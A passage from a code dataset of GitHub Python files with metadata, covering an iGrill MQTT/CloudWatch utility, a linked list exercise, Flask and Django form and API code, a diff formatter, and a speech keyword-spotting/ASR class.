mqtt_client.connect(**strip_config(mqtt_config, ['host', 'port', 'keepalive']))\n    return mqtt_client\n\ndef putMetricData(metricName, value, currentTimestamp):\n    cwClient = boto3.client('cloudwatch')\n    response = cwClient.put_metric_data(\n        Namespace='iGrill',\n        MetricData=[\n            {\n                'MetricName': metricName,\n                'Timestamp': currentTimestamp,\n                'Value': value\n            }\n        ]\n    )\n\n    logging.debug(\"put metric data\")\n    logging.debug(response)\n\n    time.sleep(6)\n\ndef publish(temperatures, battery, heating_element, client, base_topic, device_name):\n    aws_options = parser.parse_args()\n    aws_config = Config(aws_options.config_directory, config_requirements, config_defaults)\n    aws_mqtt_config = aws_config.get_config('mqtt')\n\n    if 'aws_cloudwatch_metrics' in aws_mqtt_config and aws_mqtt_config['aws_cloudwatch_metrics'] == True:\n        logging.debug(\"using aws cloudwatch metrics\")\n        currentTimestamp = time.time()\n\n        for i in range(1, 5):\n            if temperatures[i]:\n                putMetricData(\"probe\" + str(i), temperatures[i], currentTimestamp)\n        if battery:\n            putMetricData(\"battery\", battery, currentTimestamp)\n\n    else:\n        logging.debug(\"using legacy mqtt\")\n        for i in range(1, 5):\n            if temperatures[i]:\n                client.publish(\"{0}/{1}/probe{2}\".format(base_topic, device_name, i), temperatures[i])\n\n        if battery:\n            client.publish(\"{0}/{1}/battery\".format(base_topic, device_name), battery)\n        if heating_element:\n            client.publish(\"{0}/{1}/heating_element\".format(base_topic, device_name), heating_element)\n\n\ndef get_devices(device_config):\n    if device_config is None:\n        logging.warning('No devices in config')\n        return {}\n\n    device_types = {'igrill_mini': IGrillMiniPeripheral,\n                    'igrill_v2': IGrillV2Peripheral,\n                    'igrill_v3': IGrillV3Peripheral,\n                    'pulse_2000': Pulse2000Peripheral}\n\n    return [device_types[d['type']](**strip_config(d, ['address', 'name'])) for d in device_config]\n\n\ndef get_device_threads(device_config, mqtt_config, 
run_event):\n    if device_config is None:\n        logging.warning('No devices in config')\n        return {}\n\n    return [DeviceThread(ind, mqtt_config, run_event, **d) for ind, d in\n            enumerate(device_config)]\n","repo_name":"vandem9/igrill","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"93"} +{"seq_id":"71799970227","text":"#!/usr/bin/python3\n\"\"\" Module defining linked list class structure \"\"\"\n\n\nclass Node:\n\n    \"\"\" Holds node-level data for linked list \"\"\"\n\n    def __init__(self, data, next_node=None):\n        if not isinstance(data, int):\n            raise TypeError(\"data must be an integer\")\n        else:\n            self.__data = data\n        if next_node is not None and not isinstance(next_node, Node):\n            raise TypeError(\"next_node must be a Node object\")\n        else:\n            self.__next_node = next_node\n\n    @property\n    def data(self):\n        return self.__data\n\n    @data.setter\n    def data(self, value):\n        if not isinstance(value, int):\n            raise TypeError(\"data must be an integer\")\n        else:\n            self.__data = value\n\n    @property\n    def next_node(self):\n        return self.__next_node\n\n    @next_node.setter\n    def next_node(self, value):\n        if value is not None and not isinstance(value, Node):\n            raise TypeError(\"next_node must be a Node object\")\n        else:\n            self.__next_node = value\n\n\nclass SinglyLinkedList:\n\n    \"\"\" A singly linked list of ints \"\"\"\n\n    def __init__(self):\n        self.__head = None\n\n    def sorted_insert(self, value):\n        new = Node(value)\n        if self.__head is None:\n            self.__head = new\n            return\n        if new.data < self.__head.data:\n            new.next_node = self.__head\n            self.__head = new\n            return\n        current = self.__head\n        while current.next_node and current.next_node.data < value:\n            current = current.next_node\n        new.next_node = current.next_node\n        current.next_node = new\n\n    def __str__(self):\n        if self.__head is None:\n            return \"\"\n        current = self.__head\n        s = []\n        while current is not None:\n            s.append(str(current.data))\n            current = current.next_node\n        return \"\\n\".join(s)\n
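\n\nif __name__ == \"__main__\":\n    # A minimal usage sketch (not part of the original module): sorted_insert\n    # keeps the list ordered regardless of insertion order, and __str__\n    # prints one value per line.\n    sll = SinglyLinkedList()\n    for v in (3, 1, 2):\n        sll.sorted_insert(v)\n    print(sll)  # prints 1, 2 and 3 on separate lines\n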
","repo_name":"acbrimer/holbertonschool-higher_level_programming","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"13819113450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb  4 10:51:37 2020\n\n@author: chlob\n\"\"\"\n\nfileTranslate = open(\"POSTags_PTB_Universal_Linux.txt\",'r')\nfileInit = open(\"wsj_0010_sample.pos.ref\",'r') # A tilde is added at the end to avoid overwriting the source file in case of a bug\nfileOut = open(\"wsj_0010_sample.pos.ref.univ\",'w+') # A tilde is added at the end to avoid overwriting the source file in case of a bug\n\ndico = {}\nlignesTranslate = fileTranslate.readlines()\nfor ligne in lignesTranslate:\n    word = ligne.split(' ')\n    print(ligne)\n    dico[word[0]] = word[1]\n\n\nlignes = fileInit.readlines() # Iterate over the lines of the source file\nligneSortie = \"\"\nfor ligne in lignes:\n    toReplace = ligne.split('\\t')\n    size = len(toReplace[1])\n    replace = dico[toReplace[1][:size-1]]\n    ligneSortie += toReplace[0] + '\\t' + replace\n    \nfileOut.write(ligneSortie) # Write the new line into the new file \nfileTranslate.close()\nfileInit.close() # Close the source file\nfileOut.close() # Close the output file\n","repo_name":"philcl/TALProject","sub_path":"tp/TP3/script-stanford-to-univ.py","file_name":"script-stanford-to-univ.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"32805329896","text":"from wtforms import Form, StringField, SubmitField\nfrom wtforms.validators import DataRequired\nfrom flask_appbuilder.fieldwidgets import BS3TextFieldWidget, BS3TextAreaFieldWidget\nfrom flask_appbuilder.forms import DynamicForm\nfrom wtforms import widgets\n\n\nclass BS3TextAreaFieldWidget_1(widgets.TextArea):\n    def __call__(self, field, **kwargs):\n        kwargs[\"class\"] = u\"form-control\"\n        kwargs[\"rows\"] = 10\n        if field.label:\n            kwargs[\"placeholder\"] = field.label.text\n        return super(BS3TextAreaFieldWidget_1, self).__call__(field, **kwargs)\n\n\nclass BS3ButtonFieldWidget(widgets.SubmitInput):\n    def __call__(self, field, **kwargs):\n        kwargs[\"class\"] = u\"form-control\"\n        #if field.label:\n        #    kwargs[\"placeholder\"] = field.label.text\n        #if \"name_\" in kwargs:\n        #    field.name = kwargs[\"name_\"]\n        return super(BS3ButtonFieldWidget, self).__call__(field, **kwargs)\n\n\nclass YamlForm(DynamicForm):\n    baserun = StringField(('baserun'),\n                          description=(''),\n                          validators=[DataRequired()],\n                          widget=BS3TextFieldWidget())\n    testrun = StringField(('testrun'),\n                          description=(''),\n                          validators=[DataRequired()],\n                          widget=BS3TextFieldWidget())\n    yaml1 = StringField(('testrun_results config'),\n                        description=(''),\n                        validators=[DataRequired()],\n                        widget=BS3TextAreaFieldWidget_1())\n    yaml2 = StringField(('benchmark_results config'),\n                        description=(''),\n                        validators=[DataRequired()],\n                        widget=BS3TextAreaFieldWidget_1())\n    yaml3 = StringField(('benchmark_metadata config'),\n                        description=(''),\n                        validators=[DataRequired()],\n                        widget=BS3TextAreaFieldWidget_1())\n    #reset = SubmitField(\"Reset\",widget=BS3ButtonFieldWidget())\n\n\nclass NewTestrunForm(DynamicForm):\n    testrun = StringField(\n        ('testrun'),\n        description=('Note: duplicate testruns are not allowed'),\n        validators=[DataRequired()],\n        widget=BS3TextFieldWidget())\n","repo_name":"virt-s1/perf-insight","sub_path":"dashboard_server/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"93"} +{"seq_id":"25226002110","text":"# Task 1 – for loop, the len function, string slicing, the repetition operator *\n# Write a program that reads in a name and then prints that name in the following way:\n# Use only one for loop, one print statement, and the * operator for spacing (e.g. 
5 * ' ')\n\n\n\ndef ispis(ime):\n    for i in range(1, len(ime)+1):\n        pocetak = ime[0:i]\n        kraj = ime[-i:]\n        slovo = ime[-i].upper()\n        print(pocetak, \" \" * 5, kraj, \" \" * 5, slovo)\n    \ndef main():\n    unosIme = input(\"Enter a name: \")\n    ispis(unosIme)\nmain()","repo_name":"junkie385/UPROG","sub_path":"UPROG LAB 10/Zadatak01.py","file_name":"Zadatak01.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"42665535657","text":"#!/usr/bin/python\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nplt.close('all')\r\n\r\ndf = pd.read_excel(r'C:\\Users\\kkepa\\Desktop\\hokulele\\starnav\\latLon_vs_rollPitch.xlsx')\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(1, 1, 1)\r\n\r\nlatitude_error = df['lat_error']\r\nlongitude_error = df['lon_error']\r\nplt.plot(longitude_error, latitude_error, 'o', label = 'Error')\r\nax.set_xlabel('Longitude (degrees)')\r\nax.set_ylabel('Latitude (degrees)')\r\nax.set_title('Coordinate Error')\r\n\r\n\r\nlatitude = 0\r\nlongitude = 0\r\nplt.plot(longitude, latitude, 'o', c = 'green', label = 'Actual')\r\nplt.legend()\r\n\r\nplt.show()\r\n","repo_name":"kkepaalama/StarNav","sub_path":"latlonError.py","file_name":"latlonError.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"41049227638","text":"EXTENDED_SPACE = ' '\nCOUNT_INDENT = 4\n\n\ndef stylish(tree, depth):\n    # Renders the diff tree as an indented string describing the changes.\n    result = ['{']\n    open_indent = EXTENDED_SPACE * (COUNT_INDENT * depth - 2)\n    close_indent = EXTENDED_SPACE * (COUNT_INDENT * (depth - 1))\n    for node in tree:\n        key = node.get('key')\n        value = format_value(node.get('value'), depth + 1)\n        type = node.get('type')\n        if type == 'ADDED':\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol='+', key=key,\n                value=value\n            ))\n        elif type == 'DELETED':\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol='-', key=key,\n                value=value\n            ))\n        elif type == 'UNCHANGED':\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol=' ', key=key,\n                value=value\n            ))\n        elif type == 'NESTED':\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol=' ', key=key,\n                value=stylish(node.get('value'), depth + 1)\n            ))\n        else:\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol='-', key=key,\n                value=value\n            ))\n            result.append('{current_indent}{symbol} {key}: {value}'.format(\n                current_indent=open_indent, symbol='+', key=key,\n                value=format_value(node.get('value2'), depth + 1)\n            ))\n    result.append('{current_indent}{symbol}'.format(\n        current_indent=close_indent, symbol='}'\n    ))\n    return '\\n'.join(result)\n\n\ndef format_value(node, depth):\n    # Recursively formats a value; dicts are expanded with indentation.\n    open_indent = EXTENDED_SPACE * (COUNT_INDENT * depth - 2)\n    close_indent = EXTENDED_SPACE * (COUNT_INDENT * (depth - 1))\n    if isinstance(node, dict):\n        result = [\"{\"]\n        for key, value in node.items():\n            result.append('{EXTENDED_SPACE}{symbol} {key}: {value}'.format(\n                EXTENDED_SPACE=open_indent, symbol=' ', key=key,\n                value=format_value(value, depth + 1)\n            ))\n        result.append('{EXTENDED_SPACE}{symbol}'.format(\n            EXTENDED_SPACE=close_indent, symbol='}'\n        ))\n        return '\\n'.join(result)\n    else:\n        return node\n\n\ndef get_stylish_format(tree):\n    # The main function of the module\n    return stylish(tree, 1)\n
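\n\n# A worked sketch (hypothetical input, using only the node fields read above;\n# any type other than ADDED/DELETED/UNCHANGED/NESTED falls through to the\n# changed branch, here tagged 'CHANGED'):\n#   tree = [{'key': 'a', 'type': 'UNCHANGED', 'value': 1},\n#           {'key': 'b', 'type': 'CHANGED', 'value': 1, 'value2': 2}]\n#   get_stylish_format(tree) returns:\n#   {\n#       a: 1\n#     - b: 1\n#     + b: 2\n#   }\n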
","repo_name":"AnnaCanada/python-project-lvl2","sub_path":"gendiff/formats/stylish.py","file_name":"stylish.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"24855766572","text":"import urllib.request, urllib.parse, urllib.error\nimport json\n\n\napi_key = False\n# If you have a Google Places API key, enter it here\n# api_key = 'AIzaSy___IDByT70'\n# https://developers.google.com/maps/documentation/geocoding/intro\n\nif api_key is False:\n    api_key = 42\n    serviceurl = 'http://py4e-data.dr-chuck.net/json?'\nelse :\n    serviceurl = 'https://maps.googleapis.com/maps/api/geocode/json?'\n\n\nwhile True:\n    address = input('Enter location: ')\n    if len(address) < 1: break\n\n    #url = serviceurl + urllib.parse.urlencode({'address': address})\n    url = serviceurl\n    print('Retrieving', url)\n\n    uh = urllib.request.urlopen(url)\n    data = uh.read().decode()\n\n    print('Retrieved', len(data), 'characters')\n    print(data)\n    ##data =\n\n    try:\n        js = json.loads(data)\n    except:\n        js = None\n\n    print(json.dumps(js, indent=4))\n\n    #info = json.loads(data)\n    #print('User count:', len(info))\n\n    #print(json.dumps(js, indent=4))\n\n    #for item in info:\n    #    print('Name', item['name'])\n    #    print('Id', item['id'])\n    #    print('Attribute', item['x'])\n\n    break\n","repo_name":"PoptropicaSahil/ML-resources","sub_path":"Old Courses/py4e/Course 3/json2_try.py","file_name":"json2_try.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"2593896776","text":"from rest_framework.permissions import AllowAny\nfrom rest_framework.viewsets import ModelViewSet\nfrom api.models import Bachelier, DemandeDeDiplome\nfrom rest_framework.permissions import IsAuthenticated\nfrom api.serileazers import DemandeDeDiplomeSerileazers, BachelierSerileazers\n\n\nclass DemandeDeDiplomeViewSet(ModelViewSet):\n    serializer_class = DemandeDeDiplomeSerileazers\n    permission_classes = (AllowAny,)\n    queryset = DemandeDeDiplome.objects.all()\n\n\nclass BachelierViewSet(ModelViewSet):\n\n    serializer_class = BachelierSerileazers\n\n    def get_permissions(self):\n        if self.request.method == \"GET\":\n            self.permission_classes = [\n                AllowAny,\n            ]\n        else:\n            self.permission_classes = [\n                IsAuthenticated,\n            ]\n\n        return super(BachelierViewSet, self).get_permissions()\n\n    def get_queryset(self):\n        filtre_num = self.request.GET.get(\"numero\")\n        filtre_nom_prenom = self.request.GET.get(\"nom_prenom\")\n\n        if filtre_num and self.request.method == \"GET\":\n            queryset = Bachelier.objects.filter(numero_iscription=filtre_num)\n            if queryset:\n                return queryset\n            return []\n\n        elif filtre_nom_prenom and self.request.method == \"GET\":\n            nom, prenom = filtre_nom_prenom.split(\"__\")\n            queryset = Bachelier.objects.filter(\n                nom=nom.upper(), prenom=\" \".join(prenom.split(\"_\"))\n            )\n            if queryset:\n                return queryset\n            return []\n\n        else:\n            queryset = Bachelier.objects.all()\n\n        return queryset\n","repo_name":"JoyoRichard007/Diploma","sub_path":"backend/api/views/DemandeDeDiplomeView.py","file_name":"DemandeDeDiplomeView.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"40631524433","text":"import numpy as np\nimport os\nfrom scipy.ndimage.morphology import 
binary_dilation\nimport struct\nimport torch\nimport webrtcvad\n\nfrom impl.file_tools import load_module_from_disk\nfrom impl.asr_feature_pyimpl import Feature\nimport impl.model_tool as model\nimport impl.asr_decode_pyimpl as Decode_Python\nimport impl.asr_decode_beamsearch as Decode_BeamSearch\n\nfrom impl.rm_common_library.KeywordSearch.keyword_graph import PrimaryGraph, Graph\nfrom impl.rm_common_library.KeywordSearch.command_graph import CommandGraph, Command\nfrom impl.rm_common_library.KeywordSearch.token_pass_match import primary_token_pass\n\n\nclass KwsAsrApi():\n    \"\"\"\n    KwsAsrApi\n    \"\"\"\n\n    def __init__(self, bool_do_kws_wakeup=True, bool_do_asr=True, bool_gpu=True):\n        self.bool_do_kws_wakeup = bool_do_kws_wakeup\n        self.bool_do_asr = bool_do_asr\n        self.bool_gpu = bool_gpu\n\n        # cfg init\n        cfg_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"RMAI_KWS_ASR_options_Canbin.py\")\n        self.cfg = load_module_from_disk(cfg_path).cfg\n        # param_init\n        self.param_init()\n\n        # kws_asr_init\n        self.kws_asr_init()\n\n    def param_init(self):\n        self.params_dict = {}\n\n        # container\n        self.params_dict['audio_data_container_np'] = np.array([])\n        self.params_dict['feature_data_container_np'] = np.array([])\n        self.params_dict['kws_container_np'] = np.array([])  # container of kws scores, used for the sliding-window decision\n        self.params_dict['vad_bool_container'] = []  # container of vad flags, used to detect 5 s of continuous output\n        self.params_dict['output_wave_list'] = []\n        self.params_dict['asr_duplicate_counter'] = {}\n\n        self.params_dict['asr_vad_audio_data_container_np'] = np.zeros(\n            int(self.cfg.general.sample_rate * self.cfg.general.asr_vad_audio_data_ms / 1000.0))\n        self.params_dict['asr_vad_flag'] = False\n        self.params_dict['asr_vad_first_detect'] = True\n        self.params_dict['asr_vad_activate_count'] = 0\n        self.params_dict['asr_vad_activate_flag'] = False\n        self.params_dict['asr_vad_activate_pos_id'] = 0\n        self.params_dict['asr_vad_flag_count'] = 0\n        self.params_dict['asr_vad_loop_times'] = 0\n\n        self.params_dict['bool_wakeup'] = False\n        self.params_dict['counter_asr'] = self.cfg.general.asr_suppression_counter - 1\n\n    def kws_asr_init(self):\n        # init model\n        self.kws_init()\n        self.asr_init()\n        self.vad_init()\n        self.graph_init()\n\n    def run_kws_asr(self, audio_data):\n        # init \n        asr_command=[]\n        asr_user_input=''\n        # prepare data and features\n        self.papare_data_and_feature(audio_data.copy())\n\n        # if the feature container is not yet full, skip wakeup and keyword detection\n        if self.params_dict['feature_data_container_np'].shape[0] < self.cfg.general.feature_container_time:\n            return\n\n        # asr_duplicate_update_counter: update the counter to prevent duplicate detections\n        self.asr_duplicate_update_counter()\n\n        # Scheme 1: run kws wake-word detection; on a hit, switch to command-word recognition mode\n        # kws\n        if not self.params_dict['bool_wakeup']:\n            bool_find_kws = self.run_kws()\n\n            if bool_find_kws:\n                # print the result\n                print(\"\\n===============!!!!!!!!!!!!!!===============\")\n                
print(\"********************************************\")\n print(\"** \")\n print(\"** [Information:] Detect Command:\", asr_command)\n print(\"** [Information:] User Input:\", asr_user_input)\n print(\"** \")\n print(\"********************************************\\n\")\n \n # 方案二:进行 asr 检测,间隔一定时长\n # asr\n # 如果检测到唤醒词,则执行方案一\n if self.params_dict['bool_wakeup']:\n self.params_dict['counter_asr'] = 0\n else:\n self.params_dict['counter_asr'] += 1\n\n if self.params_dict['counter_asr'] == self.cfg.general.asr_suppression_counter:\n self.params_dict['counter_asr'] = 0\n\n asr_output_tuple = self.run_asr(False)\n asr_user_input=asr_output_tuple[0]\n asr_command=asr_output_tuple[1]\n # 打印结果\n # 检测是否为 小锐小锐_唤醒词\n '''\n if '小锐小锐_唤醒' in asr_output_string:\n self.params_dict['bool_wakeup'] = True\n asr_output_string = \"wakeup \"\n '''\n if len(asr_command):\n print(\"\\n===============!!!!!!!!!!!!!!===============\")\n print(\"********************************************\")\n print(\"** \")\n print(\"** [Information:] Detect Command:\", asr_command)\n print(\"** [Information:] User Input:\", asr_user_input)\n print(\"** \")\n print(\"********************************************\\n\")\n else:\n print(\"\\n** [Information:] Detecting ...\\n\")\n return (asr_command,asr_user_input)\n\n def run_vad(self, wav):\n # Compute the voice detection window size\n samples_per_window = (self.cfg.general.vad_window_length * self.cfg.general.sample_rate) // 1000\n\n # Trim the end of the audio to have a multiple of the window size\n wav = wav[:len(wav) - (len(wav) % samples_per_window)]\n\n # Convert the float waveform to 16-bit mono PCM\n pcm_wave = struct.pack(\"%dh\" % len(wav), *(np.round(wav * self.cfg.general.int16_max)).astype(np.int16))\n\n # Perform voice activation detection\n voice_flags = []\n for window_start in range(0, len(wav), samples_per_window):\n window_end = window_start + samples_per_window\n voice_flags.append(self.vad.is_speech(pcm_wave[window_start * 2:window_end * 2],\n sample_rate=self.cfg.general.sample_rate))\n voice_flags = np.array(voice_flags)\n\n audio_mask = self.moving_average(voice_flags, self.cfg.general.vad_moving_average_width)\n audio_mask = np.round(audio_mask).astype(np.bool)\n\n # Dilate the voiced regions\n audio_mask = binary_dilation(audio_mask, np.ones(self.cfg.general.vad_max_silence_length + 1))\n audio_mask = np.repeat(audio_mask, samples_per_window)\n\n vad_bool = True if (audio_mask == True).sum() / len(audio_mask) > 0.0 else False\n self.params_dict['vad_bool_container'].append(vad_bool)\n\n if len(self.params_dict['vad_bool_container']) > self.cfg.general.vad_container_time:\n self.params_dict['vad_bool_container'] = self.params_dict['vad_bool_container'][\n - self.cfg.general.vad_container_time:]\n\n assert len(self.params_dict['vad_bool_container']) <= self.cfg.general.vad_container_time\n # print(\"vad: {} {}\".format(vad_bool, (audio_mask == True).sum()/len(audio_mask)))\n # print(\"vad_container: \", self.params_dict['vad_bool_container'])\n\n run_vad_bool = False\n if len(self.params_dict['vad_bool_container']) == self.cfg.general.vad_container_time:\n if np.array(self.params_dict['vad_bool_container']).sum() == 0:\n\n # 保证唤醒后,一定会将 3s 音频用于控制词识别\n if not self.params_dict['bool_wakeup']:\n run_vad_bool = True\n\n return run_vad_bool\n\n # Smooth the voice detection with a moving average\n def moving_average(self, array, width):\n array_padded = np.concatenate((np.zeros((width - 1) // 2), array, np.zeros(width // 2)))\n ret = np.cumsum(array_padded, 
        # Compute the voice detection window size\n        samples_per_window = (self.cfg.general.vad_window_length * self.cfg.general.sample_rate) // 1000\n\n        # Trim the end of the audio to have a multiple of the window size\n        wav = wav[:len(wav) - (len(wav) % samples_per_window)]\n\n        # Convert the float waveform to 16-bit mono PCM\n        pcm_wave = struct.pack(\"%dh\" % len(wav), *(np.round(wav * self.cfg.general.int16_max)).astype(np.int16))\n\n        # Perform voice activation detection\n        voice_flags = []\n        for window_start in range(0, len(wav), samples_per_window):\n            window_end = window_start + samples_per_window\n            voice_flags.append(self.vad.is_speech(pcm_wave[window_start * 2:window_end * 2],\n                                                  sample_rate=self.cfg.general.sample_rate))\n        voice_flags = np.array(voice_flags)\n\n        audio_mask = self.moving_average(voice_flags, self.cfg.general.vad_moving_average_width)\n        audio_mask = np.round(audio_mask).astype(bool)\n\n        # Dilate the voiced regions\n        audio_mask = binary_dilation(audio_mask, np.ones(self.cfg.general.vad_max_silence_length + 1))\n        audio_mask = np.repeat(audio_mask, samples_per_window)\n\n        vad_bool = True if (audio_mask == True).sum() / len(audio_mask) > 0.0 else False\n        self.params_dict['vad_bool_container'].append(vad_bool)\n\n        if len(self.params_dict['vad_bool_container']) > self.cfg.general.vad_container_time:\n            self.params_dict['vad_bool_container'] = self.params_dict['vad_bool_container'][\n                - self.cfg.general.vad_container_time:]\n\n        assert len(self.params_dict['vad_bool_container']) <= self.cfg.general.vad_container_time\n        # print(\"vad: {} {}\".format(vad_bool, (audio_mask == True).sum()/len(audio_mask)))\n        # print(\"vad_container: \", self.params_dict['vad_bool_container'])\n\n        run_vad_bool = False\n        if len(self.params_dict['vad_bool_container']) == self.cfg.general.vad_container_time:\n            if np.array(self.params_dict['vad_bool_container']).sum() == 0:\n\n                # ensure that after wakeup the 3 s of audio is still used for command-word recognition\n                if not self.params_dict['bool_wakeup']:\n                    run_vad_bool = True\n\n        return run_vad_bool\n\n    # Smooth the voice detection with a moving average\n    def moving_average(self, array, width):\n        array_padded = np.concatenate((np.zeros((width - 1) // 2), array, np.zeros(width // 2)))\n        ret = np.cumsum(array_padded, dtype=float)\n        ret[width:] = ret[width:] - ret[:-width]\n        return ret[width - 1:] / width\n\n    def sample_rate(self):\n        return self.cfg.general.sample_rate\n\n    def window_size_samples(self):\n        return self.cfg.general.window_size_samples\n\n    def window_stride_samples(self):\n        return self.cfg.general.window_stride_samples\n\n    def papare_data_and_feature(self, audio_data):\n        # audio data\n        # concatenate the audio data\n        if len(self.params_dict['audio_data_container_np']):\n            audio_data = np.concatenate((self.params_dict['audio_data_container_np'], audio_data), axis=0)\n\n        # keep a fixed-length tail of audio for splicing the next feature chunk\n        self.params_dict['audio_data_container_np'] = audio_data[\n            len(audio_data) - self.cfg.general.window_container_samples:]\n\n        # feature\n        # compute the features\n        feature = Feature(self.cfg.general.sample_rate, int(self.cfg.general.feature_freq), int(self.cfg.general.nfilt))\n        feature.get_mel_int_feature(audio_data)\n        feature_data = feature.copy_mfsc_feature_int_to()\n\n        # concatenate the features\n        if not self.params_dict['feature_data_container_np'].shape[0]:\n            self.params_dict['feature_data_container_np'] = feature_data\n        elif self.params_dict['feature_data_container_np'].shape[0] < self.cfg.general.feature_container_time:\n            self.params_dict['feature_data_container_np'] = np.concatenate(\n                (self.params_dict['feature_data_container_np'][: -self.cfg.general.feature_remove_after_time],\n                 feature_data), axis=0)\n        else:\n            self.params_dict['feature_data_container_np'] = np.concatenate(\n                (self.params_dict['feature_data_container_np'][self.cfg.general.feature_remove_before_time: -self.cfg.general.feature_remove_after_time],\n                 feature_data), axis=0)\n\n    def kws_init(self):\n        self.kws_net = None\n\n        if not self.bool_do_kws_wakeup:\n            return\n\n        # init model\n        if self.cfg.model.bool_caffe:\n            self.kws_net = model.caffe_model_init(self.cfg.model.kws_prototxt_path,\n                                                  self.cfg.model.kws_model_path,\n                                                  self.cfg.model.kws_net_input_name,\n                                                  self.cfg.model.kws_chw_params.split(\",\"),\n                                                  self.bool_gpu)\n        elif self.cfg.model.bool_pytorch:\n            self.kws_net = model.pytorch_kws_model_init(self.cfg.model.kws_chk_path,\n                                                        self.cfg.model.kws_model_name,\n                                                        self.cfg.model.kws_class_name,\n                                                        self.cfg.model.kws_num_classes,\n                                                        self.cfg.model.image_height,\n                                                        self.cfg.model.image_weidth,\n                                                        self.bool_gpu)\n        else:\n            raise Exception(\n                \"bool_caffe = {}, bool_pytorch = {}\".format(self.cfg.model.bool_caffe, self.cfg.model.bool_pytorch))\n\n    def asr_init(self):\n        self.asr_net = None\n        self.asr_decoder = None\n\n        self.asr_beamsearch = None\n        self.lm = None\n\n        if not self.bool_do_asr:\n            return \n\n        # init model\n        if self.cfg.model.bool_caffe:\n            self.asr_net = model.caffe_model_init(self.cfg.model.asr_prototxt_path,\n                                                  self.cfg.model.asr_model_path,\n                                                  self.cfg.model.asr_net_input_name,\n                                                  self.cfg.model.asr_chw_params.split(\",\"),\n                                                  self.bool_gpu)\n        elif self.cfg.model.bool_pytorch:\n            self.asr_net = model.pytorch_asr_model_init(self.cfg.model.asr_chk_path,\n                                                        self.cfg.model.asr_model_name,\n                                                        self.cfg.model.asr_class_name,\n                                                        self.cfg.model.asr_num_classes,\n                                                        self.bool_gpu)\n        else:\n            raise Exception(\n                \"bool_caffe = {}, bool_pytorch = {}\".format(self.cfg.model.bool_caffe, self.cfg.model.bool_pytorch))\n\n        # init bpe dict \n        self.asr_decoder = Decode_Python.Decode()\n        self.asr_decoder.init_symbol_list(self.cfg.model.asr_dict_path)\n        \n        # init lm\n        if self.cfg.general.decode_id == 1:\n            self.asr_decoder.init_lm_model(self.cfg.model.asr_lm_path)\n            \n            lexicon = Decode_BeamSearch.load_lexicon(self.cfg.model.asr_dict_path)\n            self.asr_beamsearch = Decode_BeamSearch.BeamSearch(lexicon, beam_size=15)\n            
self.lm = Decode_BeamSearch.Ken_LM(self.cfg.model.asr_lm_path)\n\n\n    def vad_init(self):\n        self.vad = None\n        self.vad = webrtcvad.Vad(mode=self.cfg.model.vad_mode)\n\n    def graph_init(self):\n        self.graph = None\n        self.graph = CommandGraph.build(self.cfg.model.graph_path)\n        #self.graph = Graph.build(self.cfg.model.graph_path)\n\n    def run_kws(self):\n        # init\n        kws_score_list = []\n\n        if not self.bool_do_kws_wakeup:\n            return False\n\n        # sliding window + model forward pass\n        # each call feeds in 1 s of data, so only that 1 s of features needs the sliding window and forward pass; otherwise detections would repeat\n        kws_wakeup_times = int((self.cfg.general.feature_time) * 1.0 / self.cfg.general.kws_stride_feature_time) + 1\n\n        # run the model over each incoming 1 s of data\n        for kws_wakeup_time in range(kws_wakeup_times):\n            end_feature_time = self.params_dict['feature_data_container_np'].shape[0] - (\n                    kws_wakeup_times - kws_wakeup_time) * self.cfg.general.kws_stride_feature_time\n            start_feature_time = end_feature_time - int(self.cfg.general.kws_feature_time)\n            assert start_feature_time >= 0, \"kws wakeup model feature window too long; the buffered audio cannot yield {} sliding-window results\".format(kws_wakeup_times)\n\n            feature_data_kws = self.params_dict['feature_data_container_np'][start_feature_time: end_feature_time, :]\n            feature_data_kws = feature_data_kws.astype(np.float32)\n\n            if self.cfg.model.bool_caffe:\n                net_output = model.caffe_model_forward(self.kws_net,\n                                                       feature_data_kws,\n                                                       self.cfg.model.kws_net_input_name,\n                                                       self.cfg.model.kws_net_output_name,\n                                                       self.cfg.model.kws_transpose)\n            elif self.cfg.model.bool_pytorch:\n                net_output = model.pytorch_model_forward(self.kws_net,\n                                                         feature_data_kws,\n                                                         self.bool_gpu)\n\n            net_output = np.squeeze(net_output)\n            kws_score_list.append(net_output.copy())\n\n        # if kws results were carried over, concatenate them\n        kws_score_np = np.array(kws_score_list)\n        if len(self.params_dict['kws_container_np']):\n            kws_score_np = np.concatenate((self.params_dict['kws_container_np'], kws_score_np), axis=0)\n\n        bool_find_kws = False\n        for kws_idx in range(len(kws_score_np) + 1 - kws_wakeup_times):\n            # slide the window to get the post-processed result\n            